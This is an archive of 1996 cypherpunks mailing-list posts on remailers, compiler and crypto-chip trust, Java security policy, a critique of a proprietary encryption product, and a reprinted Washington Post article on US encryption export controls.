Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Perry <perry@vishnu.alias.net>
Date: Mon, 26 Feb 1996 06:57:50 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: mismaster
In-Reply-To: <Pine.SUN.3.91.960225153301.13711A-100000@polaris.mindport.net>
Message-ID: <199602252225.QAA07120@localhost.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "Black" == Black Unicorn <unicorn@schloss.li> writes:


    Black> Where is the latest version of mixmaster available?

    Black> I can't seem to get hold of obscura for lance's homepage
    Black> and * http://nately.ucsd.edu/~loki/ *
    Black> ftp://nately.ucsd.edu/pub/remail/ seem to be down.

    Black> Any ideas?

You can obtain Mixmaster via FTP or WWW by connecting to
vishnu.alias.net and following the instructions.

 John Perry - KG5RG - perry@vishnu.alias.net -  PGP-encrypted e-mail welcome!
 WWW - http://www.alias.net
 PGP 2.62 key for perry@vishnu.alias.net is on the keyservers.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMTDhwKghiWHnUu4JAQFavAf/Yatwc0we2Km4Ks66Of9/OdKpeYDaqvKw
fnv6y7u7ZFCrSRsJDkXw5VGGtCldpSx5NwZnc7woCmAm5U+U4sXwKgrBcaWzoEhK
FODcu/i1hVWK1ILDRcQA2aGv5s+BNTN7j33gKh0GBeZ07czr7Tv5KUHpbaGDNJZk
zKEMGxilqVbBmYyeRkAzOgCq/2hed0BMYvW/dplfHR/thvX8LiEb0AnRqWZINRf2
vqCdZhoMyXXI49rurc3kBjJkeR9Vg7kPGTrdsTnBTydR/XdQAZWLFD992sA4KZXe
I+pqLqouux3J9W8KcXOdxSNzWxrv6/rrN42wWzBTv7A0NWVBjkIajg==
=3+5U
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Mon, 26 Feb 1996 09:07:49 +0800
To: "Jeffrey I. Schiller" <jis@mit.edu>
Subject: Re: Internet shutdown Feb 29?
In-Reply-To: <ad567e9300021004c463@[18.162.1.1]>
Message-ID: <Pine.SOL.3.91.960225162707.21619A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 25 Feb 1996, Jeffrey I. Schiller wrote:

> 
> Yeah, from several of ISP's and others (including one un-named government
> organization that wanted to FAX us the message, for security reasons,
> didn't want to send it over the network).
> 

As a matter of interest, I wonder how much of the internet could be 
shut down by concerted effort; obviously individual services can be 
trivially disabled by jamming listen queues (not really stoppable by 
anything short of IPSEC w/photuris). The BGP backbone could probably be 
disabled from within by a traitor planted in one of big companies, and a 
confused backhoe around the MAEs could probably do a lot more damage than 
people would like to admit. It seems that the internet is getting pretty 
brittle- I wonder if it would be worthwhile having some sort of infranet 
with a bunch of backups links using dial-up lines or spare transponders 
(with a filter to block port 80 :-)

It's probably not possible with  todays routing technology 
(slow, flappy links with nightmarish convergence times), plus it's not 
sexy like a nice OC-12 SONET. This is the sort of thing the NCSC should 
be working on- something to keep the essential services flowing in the 
early stages of an info-war, or an info truck-bomb




---
They say in  online country             So which side are you on boys
There is no middle way                  Which side are you on
You'll either be a Usenet man           Which side are you on boys
Or a thug for the CDA                   Which side are you on?
  National Union of Computer Operatives; Hackers, local 37   APL-CPIO





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Mon, 26 Feb 1996 06:37:33 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: mismaster
In-Reply-To: <Pine.SUN.3.91.960225153301.13711A-100000@polaris.mindport.net>
Message-ID: <Pine.LNX.3.91.960225165857.131A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 25 Feb 1996, Black Unicorn wrote:

> Where is the latest version of mixmaster available?
> 
> I can't seem to get hold of obscura for lance's homepage and 
>      * http://nately.ucsd.edu/~loki/
>      * ftp://nately.ucsd.edu/pub/remail/
> seem to be down.
> 
> Any ideas?

The new URL is http://www.obscura.com/~loki/ .  You can also get mixmaster
from ftp.hacktic.nl.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xf9b22ba5
http://www.voicenet.com/~markm/ | bd24d08e3cbb53472054fa56002258d5


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMTDcQLZc+sv5siulAQGYEAP/XdAwLotOq4QfeCehBxlM86cNqz4uwLaO
JKajKMaOiHY/isbA5QkKK+n67YxsgS+tuVw/Hpfx4CE8lJa+HIgMc8DvRsyRKjWR
U45/qseGR1yzZpP+rZJRWvGYi8qxU2wgWqDwgC9KbbwVRBN29RJnfkTXFyFiMsmC
MJ2snd1Shpg=
=8Nzx
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Mon, 26 Feb 1996 06:52:02 +0800
To: cypherpunks@toad.com
Subject: Re: Cypherpunks vs. Coderpunks
In-Reply-To: <2.2.32.19960225174116.005d16a8@opus.SanDiegoCA.ATTGIS.com>
Message-ID: <Pine.LNX.3.91.960225170323.131B-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 25 Feb 1996, Chris Claborne wrote:

>   I filter to an unread area and then try to read once per week.  I know
> that I trim off good articles while trying to trim the fat off.  If you
> can't exercise restraint, how about putting "junk" as the first word in your
> subject.  

Many people put "[NOISE]" in the beginning of the "Subject:" header to filter
out non-crypto related posts.  However, this does not work too well, as many
posts labelled as noise are really quite interesting, and many off-topic posts
are not labelled as such.  This kind of labelling also gets annoying because
it screws up subject threading.

If you really want to kill-file all noise postings, just remember to also
kill replies (lines beginning with "Re: [NOISE]").

- --Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xf9b22ba5
http://www.voicenet.com/~markm/ | bd24d08e3cbb53472054fa56002258d5


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMTDd27Zc+sv5siulAQHMCAQAlWDh3Z6Z+p/EpV7W1KcOnB8BtrtJNayE
RGB9JAI3o+2HOFo92ilzIh39DdOt3BUmhklQT2WvqZtbSWQwozJObtV33ux8R00k
GKjUfpBKjL9d7e+6+pmeFaznQ4wz2MsxNIRJx/2atsD6+S3nJdXCs9zRtLxO3cdZ
qqUF0KUo9cE=
=Ss/j
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Mon, 26 Feb 1996 13:25:50 +0800
To: cypherpunks@toad.com
Subject: Re: Encryption Chips
Message-ID: <199602260231.SAA00902@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:52 AM 2/25/96 -0800, Timothy C. May wrote:
>At 4:47 PM 2/25/96, "A. Padgett Peterson P.E. Information Security"
>
>>The nice thing about am implimentation in software is that the code can be
>>examined for just this sort of thing *on a randomly selected operating unit*.
>>- hard to do with a chip.
>
>But of course one's compiler may have been subverted, as Ken Thompson
>showed some years back. Software implementations are sensitive to different
>sorts of attacks than hardware implementations are.

These things do not need to be verified at the source level.  One could
verify the output of the compiler and then publish a secure hash of it. 
(What an tedious job.)  There is infinite regress in these things, but I
would tend to trust a program which verified the secure hash of the crypto
system if that program was written after I received the release of the
compiler I am compiling it with.

Regards - Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 26 Feb 1996 08:06:03 +0800
To: cypherpunks@toad.com
Subject: Crypto Export Legislation?
Message-ID: <199602252338.SAA25184@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


The excerpt below is from the Wash Post article today. Does 
anyone know the status of the Leahy/Goodlatte bills?


BTW, it's been suggested that this article is sufficiently on 
topic to post to the list in its entirety. Anyone else whose 
seen it agree?


----------


   The Washington Post, February 25, 1996, pp. H1, H4.


   Scrambling for a Policy on Encryption Exports

   [Long snip]


   Industry also is fanning Congress's interest in taking a
   bigger role in the encryption debate. "Without
   congressional interest, the administration has no reason to
   liberalize exports at all," said Becca Gould, director of
   policy at the Business Software Alliance. "This issue is in
   Congress's front yard because it affects the economy" as
   well as U.S. citizens' privacy rights.

   Sen. Patrick J. Leahy (D-Vt.) and Rep. Robert W. Goodlatte
   (R-Va.) agree. They plan to introduce bills in the Senate
   and House aimed at loosening the restrictions on
   encryption. "The federal government is taking an attitude
   that's based more in the 1970s than in present time," said
   Leahy in a telephone interview.

   "This is a matter that should be decided by legislation,"
   he added. "We're talking about billions of dollars in
   revenues and thousands of jobs if we're handicapped in our
   global market, especiaUy if what we're told to do is to
   build an export encryption program that is so outdated that
   our 12-year-old computer experts wouJd laugh at it."

   The bills would do away with export licenses for any
   encryption technology considered to be "generally
   available," or "in the public domain." Leahy said that
   although he, too, worries about national security and
   terrorism, trying to bottle up technology won't solve the
   problem.

   Law enforcement has "got to figure out how to keep ahead
   ... and surprise, surprise, there will be some times when
   we won't be able to eavesdrop," Leahy said. Even now,
   criminals can make calls at pay telephones or avoid
   detection in other ways. The government shouldn't cripple
   the computer industry every time a new technology springs
   up that challenges law enforcement, he said.

   "What I'm suggesting is that if [the administration] works
   with the Congress, we'll find a solution," Leahy said.

   ...







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 26 Feb 1996 02:04:16 +0800
To: cypherpunks@toad.com
Subject: White House Not Decent
Message-ID: <199602251743.SAA25966@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



(Reprinted without permission from the Seattle Times
Personal Technology section)


                 White House Site Blocked

Add the White House to the Internet's extensive list of dens of
sin.

Surfwatch, a widely used software program that prevents access
to, and downloading of, sexually explicit material on the
Internet, accidently blocked access to the White House home page
recently - all because a "White House for Kids" Web site address
contained the word "couples."

That's a dirty word in the Surfwatch universe because many
sexually explicit online sites use it as part of their come-on.

In this case, "couples" merely referred to the Executive Branch
tandems of President and Hillary Rodham Clinton and Al and Tipper
Gore.

Surfwatch fixed the problem within hours, although some might
still find the site offensive.

For political reasons, that is.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Mon, 26 Feb 1996 10:37:51 +0800
To: Mutant <wlkngowl@unix.asb.com>
Subject: Re: ViaCryptPGP 4.0?! (was Re: PGP integrated into Z-Mail)
In-Reply-To: <199602210524.AAA10716@bb.hks.net>
Message-ID: <199602260201.VAA32358@in-touch.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> ViaCrypt's page talks about a beta version of PGP 4.0 available
> at some sites. Hmmm.
> 
> The Windows version is tantalizing. A PGP.DLL would be a wonderful thing.

PGP3, which I've been working on with Colin Plumb for some time, is
based upon a specified API.  Although the API is still under
development, the plan is to have libraries available for UNIX, Mac,
and Windows (DLL).

At this time the API Spec and Programmer's Guide documents are not
publically available.  Hopefully this will change in the next few
weeks.

-derek





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Mon, 26 Feb 1996 10:32:52 +0800
To: PADGETT@hobbes.orl.mmc.com (A. Padgett Peterson P.E. Information Security)
Subject: Re: Encryption Chips
In-Reply-To: <960225114724.20210a61@hobbes.orl.mmc.com>
Message-ID: <199602260205.VAA24540@homeport.org>
MIME-Version: 1.0
Content-Type: text


a. huh?
b. I was assuming something similar to the Sun /dev/des, which is
basically invoked as 
int cbc_crypt(key, data, datalen, mode, ivec)
              ^^^

If your chip is doing key generation for you, then testing is tougher.

Adam


A. Padgett Peterson P.E. Information Security wrote:

| >	Faking crypto chips for public algorithims is theoretically
| >more difficult, because its simple to create a DES_verify routine to make
| >sure your DES chip is working right.
| 
| a) chips do not need makeup
| b) t'were me, I would just fix the chip so that instead of 2^56 (DES) keys
|    or whatever, the PRNG was "fixed" so that the total keyspace was only 2^32
|    for instance. Enough to be nearly impossible to check but small enough


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Mon, 26 Feb 1996 11:01:06 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Java configurability
Message-ID: <199602260229.VAA24656@homeport.org>
MIME-Version: 1.0
Content-Type: text


Alex Strasheim wrote:

| What are we talking about specifically when we talk about security
| oriented configurability?  Rather than just turning java(script) on and
| off, wouldn't it be useful to piggyback off of the X.509 system that's
| already in place?

| For every CA's or server's cert, they'd just have to add two checkboxes:  
| whether or not to run java applets or javascript code from servers 
| vouched for by those certs.  Is that what people mean when they talk 
| about configurability, or just the ability to shut down java*script) all 
| together?

	I mean the ability to shut down Java or JavaScript (hereafter
called J-code), but not only from a user point of view.  Its
ludicrously easy to convince users to do things that they shouldn't be
doing, so not only do we need a Java off and JavaScript off button
within Netscape, but we also need a means to enforce it at a company
wide level.

	Think about it from the point of view of a business.  There's
this Java software.  You keep reading about how its not really secure
in the press.  Do you trust your users to do the right thing?  You
know how they'll do things like arbitrarily change their IP address
on you.

	So, what do we want as a business?  We want the ability to
define trust.  We want to be able to say what our users can do with
the machines & software we put on their desktop.  We want to be able
to provide them with applets to run.

	This generates a set of needs.  First, we need to be able to
tell Netscape about our corporate policy.  The logical place to do
that is at the HTTP proxy on our firewall.  (Or possibly at a
different port on the machine.)

	Once we have the ability to provide "MUST obey" directives, we
need to ask what those directives should be.  Obviously, we might want
the ability to turn J-code off when passing through this
gateway.

	Next, we would want the ability to allow SELECTED or approved
J-code through.  How do we select it?  It comes from an approved
source.  That source verifies that it created/vetted the code with a
digital signature.  (With an expiration date on it, please.  Code
should need to be re-certified in the light of new bugs in J.)

	The certificate would need to sign a block with at least:

	{<Code block>
	<Valid through>
	<Java Version>
	<Policies approved>}

	Policies?  Thats right.  Java has the potential to do some
really nifty stuff at the corporate level.  Purchasing agents, travel
& reimbursement, etc are the obvious ones.  But those might well need
to be allowed access to disk or network resources.  The fact that I
allow a bit of code signed by the NSA to run doesn't mean I want it to
be as privledged as code written locally.

	Now, the fact that Vericode thinks this code should get disk
access doesn't mean your company does.  So the policy there is a
MAXIMUM level of access that the J-code should get.  I might set it at
less, say, only allowed access to accounting_gw, on port 3456, between
9AM and 5PM.  (I think time controls are a loss, but lots of people
seem to like them.)

	So what would go into a config file?  Things should start
based on a global prohibition.  'That which is not explicitly allowed
is forbidden.'  With the permission of the company, it should be
possible to swap this towards todays setup 'That which is not
forbidden is allowed.'  However, I doubt many companies will go for
that.  None with smart security people will.

	So, having prohibited everything, we now consider if we should 
allowing any of these J-code things to run.  And how do we
discriminate?  Signatures.  So we need to put keys (and fingerprints)
into the config file.

	Once we have keys in the file, we start assigning them
privledges.  "Can examine this file."  "Can examine this list of
files."  "Can write in /tmp, assuming that its less than 80% full."
"Can edit the file /etc/passwd."

	So, is it more clear what I'm looking for?

	(Incidentally, X.509 is a bear.  Read Carl Ellison's comments
last November, and also Ross Anderson's 'Robustness Principles' paper.)

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ab411@detroit.freenet.org (David R. Conrad)
Date: Mon, 26 Feb 1996 12:06:21 +0800
To: cypherpunks@toad.com
Subject: Percy the Python loves IPG
Message-ID: <199602260341.WAA26557@detroit.freenet.org>
MIME-Version: 1.0
Content-Type: text/plain




I think the IPG system is great!  Percy, my pet python, has never been
slicker or better lubricated!

IPG Sales <ipgsales@cyberstation.net> wrote:
>Perhaps so, but our system does employ a true hardware generated OTP, and
>operates similiar to what you describe -  however, the important
>differernce is that we use a smal;l OTP to generate a larger OTP, like
>stringing the cable across the Golden Gate narrows.

What you have, as far as I can tell, with your "random-number-rotor-large-
random-prime-number-rotor-wheels", is a proprietary encryption algorithm
that uses a 5600-bit random number as a key.

There are two points on which you are to be commended.  5600 bits is
plenty large as a key (excessive, even), and you claim to generate the
key with a true hardware RNG.

Unfortunately, you are undone by two points which go against your scheme.

First, your algorithm is proprietary, and as such is probably not worth
a hill of beans.

Second, the keys to your system are known to three parties: the sender of
a message, the recipient of that message, and your company!  This means
that your company can intercept and decrypt any message that uses your
system.  All that is required is to keep a record of all keys generated
and who they were distributed to, and to know the identities of the
people communicating.

You've already indicated, when you claimed "790 gigabytes" of data
generated for testing with "multiple backups", that your company has
the capability to store and access multiple terabytes of information.

I'm sure you will protest your honesty; you may even *be* honest, but the
security of your system will rely not only on the security of the algorithms
and their correct implementation, but also on the honesty of your company
and every employee who ever works for it.

I don't need to trust R, S, and A whenever I use RSA, so long as the
algorithm is secure, and correctly implemented.

> Just becuase we
>convert over from a full OTP to a prime number wheel system configured
>from the OTP doers not mnean that the result is not an OTP

Of course it does.  Which part of "One" don't you understand?


--
David R. Conrad, conrad@detroit.freenet.org   PGP key on    GDFN Hardware and
http://detroit.freenet.org/staff/conrad        home page   Software Committee
"If you can't say 'fuck', you can't say 'fuck the government'." --Lenny Bruce




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Mon, 26 Feb 1996 13:28:37 +0800
To: cypherpunks@toad.com
Subject: X.509 certs that don't guarantee identity
Message-ID: <199602260448.WAA01201@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


On the 23rd, Jeff Weinstein said this concerning the natural 
semi-anonymity of the net:

> Given that verisign and others will soon begin issuing large numbers of
> certificates that do not guarantee the identity of the key holder, it seems
> that this tradition will continue even with the wide deployment of X509 
> certs.

This has been bugging me since I read it.  I'm not sure I understand the 
plan;  it only makes sense to me if "anonymous" X.509 certs are issued 
for user authentication only, not for server authentication.  Is that 
what this is about?

(If anonymous certs are issued for servers, why should such a cert be 
treated any differently than one I generate on my own, which causes 
warning screens about an unknown CA to pop up?)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ab411@detroit.freenet.org (David R. Conrad)
Date: Mon, 26 Feb 1996 12:28:01 +0800
To: cypherpunks@toad.com
Subject: Ass. Politics
Message-ID: <199602260351.WAA28868@detroit.freenet.org>
MIME-Version: 1.0
Content-Type: text/plain




Salman Rushdie, in a speech I heard several years ago, said that it was
widely doubted that Iran would or could actually come up with the three
million dollar bounty on his head.

This may play a large part in why he is still around.

Also, while speaking at the National Press Club recently, flogging his
new book, he said (from memory), "Iran now wants us to believe that they
don't want to kill anyone, and in fact never did.  I wish they'd told us
sooner, it would have saved a lot of trouble."  This was greeted with
laughter.  He added, "But when the European Union tries to get them to
put it in writing, they are unwilling to do so."

If Iran is sending mixed messages about whether they even *intend* to
pay off, coupled with widespread doubts of their ability to, it isn't
surprising that no one has offed him.

I think all the analyses of the economic costs of protecting one person
vs. protecting many people are rather beside the point, in light of this.


--
David R. Conrad, conrad@detroit.freenet.org   PGP key on    GDFN Hardware and
http://detroit.freenet.org/staff/conrad        home page   Software Committee
"If you can't say 'fuck', you can't say 'fuck the government'." --Lenny Bruce




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 26 Feb 1996 12:27:11 +0800
To: cypherpunks@toad.com
Subject: TWP on Crypto Export Policy
Message-ID: <199602260353.WAA13754@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The Washington Post, February 25, 1996, pp. H1, H4.


   Scrambling for a Policy on Encryption Exports

      As Technology Advances, U.S. and Industry Seek
      Compromise That Balances Public, Private Fears

   By Elizabeth Corcoran


   Keeping information about technology out of other people's
   hands gets tougher all the time. And in the realm of the
   Internet, where information ignores boundaries and some
   cybersurfers flaunt rules, it may become impossible.

   A big test of that statement is emerging in cryptography,
   the business of scrambling information so that it looks
   like gibberish to anyone lacking the keys for unlocking the
   code.

   Once considered an arcane subspecialty of mathematicians
   and espionage, cryptography is rapidly becoming big
   business as more and more of the world's information is
   exchanged on electronic networks and as more and more
   people want to protect their data from prying eyes.

   But in these times of international terrorism, drug
   trafficking and sometimes peculiar financial transactions,
   law enforcement agencies want to be able to legally
   eavesdrop. As technology has grown dramatically more
   powerful, the ability to peek at encrypted information is
   slipping from the hands of government.

   That balance -- how much access can government demand vs.
   how much privacy others want -- has long been a theological
   debate between civil liberties advocates and worried law
   enforcement officials.

   Now, giddy with the growth of the Internet, technology
   companies have joined the debate. Both the software
   industry and civil liberties advocates believe powerful
   encryption will spur the growth of electronic
   communications and the Internet. And they don't want
   encryption restrictions to curb that growth.

   There are no limits on what kinds of encryption people can
   use within the United States. But the government has used
   export restrictions to try to shape what encryption
   technology is used internationally, and by extension, what
   is available in the United States. Those export laws
   prohibit U.S. companies from selling their best technology
   overseas.

   The restrictions, companies contend slow the development of
   the Internet and harm a potentially lucrative market for
   U.S. manufacturing. Making two flavors of an encryption
   product, U.S. companies contend, is expensive. Yet even
   more worrisome is that foreign competitors are likely to
   move in and offer better technology. That could spell the
   loss not just of sales of encryption technology, but of
   many other products that rely on strong digital protection
   as well.

   So companies are looking hard for ways to wriggle around
   the rules -- and beginning to find them.

   "Trying to suppress this technobgy is like Prohibition,"
   said Whitfield Diffie, a cryptographer at Sun Microsystems
   Inc. and an outspoken advocate of widespread use of
   encryption technology. Companies will use anything at hand
   -- technology, business strategies and even the promise of
   congressional action -- to begin to get their home-brews
   out.

   Building and breaking encryption is hard. All information
   stored in computers -- whether pictures or sounds or
   documents -- is represented by ones or zeros or bits, the
   genetic code of the digital world. Encryption techniques
   amount to applying clever mathematical formulas to a
   collection of bits to make it look like gibberish to the
   uninitiated.

   Unlocking encrypted data requires a "key," a mathematical
   formula that can make sense of the tricks used to scramble
   the data. One common way to measure the sophisticaticn of
   an encryption scheme is by the number of bits in the key.
   The more bits, the harder it is to decode the information.

   A 30-bit key, for instance, could take as many as a billion
   random calculations to crack the code. A 60-bit key could
   take a billion-times-a-billion calculations.

   In past decades, governments were largely the only
   organizations with the money and need to tackle such
   expensive problems. But as the power of computers has
   soared -- and the cost of running millions of calculations
   has fallen -- companies and individuals have begun to
   clamor for sophisticated encryption.

   "We believe that encryption is a critical technology" to
   support many areas of electronic commerce, said Craig
   Mundie, a senior vice president at Microsoft Corp.

   Under current rules, U.S. companies can export encryption
   technologies that use up to 40-bit keys. A few years ago,
   such a lock might have stopped all but the most determined
   digital interlopers.

   No more. Within the past year graduate students at the
   Ecole Polytechnique in Paris and others at the
   Massachusetts Institute of Technology have shown they can
   break the 40-bit encryption used by Netscape Communications
   Corp. A few weeks ago, Diffie and six other well-know
   cryptographers began circulating a report in which they
   argue that to "adequately" protect information for the next
   20 years, keys should be as long as 90 bits.

   Even encryption wizards at the National Security Agency
   would have trouble unlocking 90-bit encrypted information,
   experts say.

   So the government has tried to craft a compromise. Last
   summer, the government suggested that it would likely let
   companies use up to 64-bit encryption -- provided they set
   up a way for law enforcement agents, with a court order, to
   unlock encrypted information.

   Under this proposal, a "trusted third party," such as a
   bank or an encryption company that typically handles
   sensitive information, would safeguard the key. The plan
   has since bogged down over such details as precisely who
   might qualify as a trusted third party.

   Last fall, Trusted Information Systems (TIS) in Glenwood,
   Md., in what it calls a test case, applied for a license to
   export a sophisticated (and still unexportable) 56-bit
   encryption system called DES. Steve Walker, who heads TIS,
   has invested months in outlining the sort of spare-key
   program that he believes both the government and his
   customers can stomach. In late January, he got approval to
   ship his product to Britain.

   "It's not perfect; it's not where we want to be," Walker
   insisted. He purposely submitted a case, he said, that was
   virtually certain to meet the government's still evolving
   criteria. "But it's a first, giant baby step," he said.

   Trusting a Third Party?

   Others are uneasy with putting the means to unlock files in
   the hands of a "trusted third party."

   "Ask anyone who owns a business: Are they willing to give
   copies of a spare key that leads to everything sensitive in
   their company to a third party," said Jim Bidzos, chief
   executive of RSA Data Security Inc., a leading encryption
   firm.

   But government officials get nervous if the only keys to
   the scrambled material are held by its owners. Ed Roback,
   an encryption policy specialist at the National Institute
   of Standards and Technology, puts it this way: "I know of
   few front doors that can't be broken down. It's a little
   different with encryption," when it literally might take
   10,000 years to break the code without the key.

   Roback and law enforcement officials say they'd be
   delighted to see Americans make more use of encryption,
   particularly if spare keys were held by a third party.
   "This nation, more than any other, relies on computers ...
   [so] there's a lot of vulnerability and encryption can help
   that," Roback said. "So it's a good thing -- but it can
   present a problem for national law enforcement."

   But momentum in the United States could swing toward
   widespread use of sophisticated encryption -- without spare
   keys -- if such technology was widely available. That's
   just what a recent announcement from Microsoft could help
   spur.

   In January, Microsoft told developers it had created a
   module in its operating system software that will let
   applications such as word processing programs or
   spreadsheets "plug in" to encryption technology.

   An application developer who built a software program for
   filing expense accounts would not have to add encryption to
   his product. Instead, the developer would need only to
   write a small program that taps the encryption technology
   available through the operating system.

   The strength of the encryption program could vary.
   Microsoft plans to include a 40-bit code with the version
   of Windows used principaUy by companies (called Windows
   NT). That encryption technology would be easy to export.
   But Microsoft also is encouraging other encryption firms,
   including RSA and TSI, to build more sophisticated
   encryption modules that could be used in the United States.

   Commercial products that take advantage of the new function
   are not likely to appear until the end of the year. But
   Microsoft is hoping it will spur more widespread use of
   encryption. "The single most pressing problem for
   electronic commerce is to create a secure payment
   structure," Mundie said -- and Microsoft is hoping to
   accelerate that work.

   RSA's Bidzos is among those in industry who would love to
   see the government give up on trying to control encryption
   technology. He worries that other countries are gearing up
   to snatch a big role in selling encryption while his
   company and other U.S. businesses remain entangled in U.S.
   policies.

   So he's testing the rules. Early this month, RSA announced
   that it had created subsidiaries in the People's Republic
   of China and in Japan. In China, RSA partners include the
   Chinese government. Bidzos plans to do joint research on
   encryption software with scientists there.

   Although Bidzos says he is planning to export only the
   approved, 40-bit encryption technology to his Chinese
   colleagues, "one genuine concern is that they might try to
   strengthen it themselves," he said. "It would be hard to do
   -- but not impossible. I've never had a conversation with
   [the Chinese] about it," Bidzos added.

   In addition, the Chinese have some interesting ideas of
   their own about new areas of cryptography, Bidzos said.
   "They're pretty advanced." And if the group developed more
   powerful techniques than even RSA has in the United States?
   Bidzos shrugged. RSA would likely take any promising ideas
   and develop them into products in the United States. As for
   Chinese export restrictions, "I haven't thought about it,"
   he said.

   Going Up to the Hill

   Industry also is fanning Congress's interest in taking a
   bigger role in the encryption debate. "Without
   congressional interest, the administration has no reason to
   liberalize exports at all," said Becca Gould, director of
   policy at the Business Software Alliance. "This issue is in
   Congress's front yard because it affects the economy" as
   well as U.S. citizens' privacy rights.

   Sen. Patrick J. Leahy (D-Vt.) and Rep. Robert W. Goodlatte
   (R-Va.) agree. They plan to introduce bills in the Senate
   and House aimed at loosening the restrictions on
   encryption. "The federal government is taking an attitude
   that's based more in the 1970s than in present time," said
   Leahy in a telephone interview.

   "This is a matter that should be decided by legislation,"
   he added. "We're talking about billions of dollars in
   revenues and thousands of jobs if we're handicapped in our
   global market, especially if what we're told to do is to
   build an export encryption program that is so outdated that
   our 12-year-old computer experts would laugh at it."

   The bills would do away with export licenses for any
   encryption technology considered to be "generally
   available," or "in the public domain." Leahy said that
   although he, too, worries about national security and
   terrorism, trying to bottle up technology won't solve the
   problem.

   Law enforcement has "got to figure out how to keep ahead
   ... and surprise, surprise, there will be some times when
   we won't be able to eavesdrop," Leahy said. Even now,
   criminals can make calls at pay telephones or avoid
   detection in other ways. The government shouldn't cripple
   the computer industry every time a new technology springs
   up that challenges law enforcement, he said.

   "What I'm suggesting is that if [the administration] works
   with the Congress, we'll find a solution," Leahy said.

   "We say over and over that we recognize that this is a very
   difficult issue," Roback said. But, he added, "the
   government has thought about [encryption policies] for a
   long time as well as industry," he said. To reach some
   resolution, he added, "compromise is going to be necessary
   on all fronts."

   [Photo] Jim Bidzos, chief executive of RSA Data Security
   Inc., a leading encryption firm, hopes the government wlll
   let go of encryption technology controls.

   _________________________________________________________

   Code Breakers

   Recent advances in technology have allowed much faster and
   cheaper invasion of encrypted information. The deciphering
   time, however, varies widely with the computer power of the
   attacker.

   Here are estimates of cracking times by one group of
   experts.

   Type of         Budget for      Time to       Time to
   attacker        computing       recover       recover
                   engine          40-bit key    56-bit key
   _________________________________________________________

   Pedestrian
   hacker          $400            5 hours       38 years

   Small
   business        $10,000         12 minutes    556 days

   Corporate
   department      $300,000        24 seconds    3 hours

   Big company     $10 million     7 seconds     13 hours

   Intelligence
   agency          $300 million    0.0002 sec.   12 seconds
   _________________________________________________________

   Source: Report by an ad hoc group of cryptographers and
   computer scientists Matt Blaze, Whitfield Diffie, Ronald L.
   Rivest, Bruce Schneier, Tsutomu Shimomura, Eric Thompson,
   Michael Wiener.
   _________________________________________________________

   [End]












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
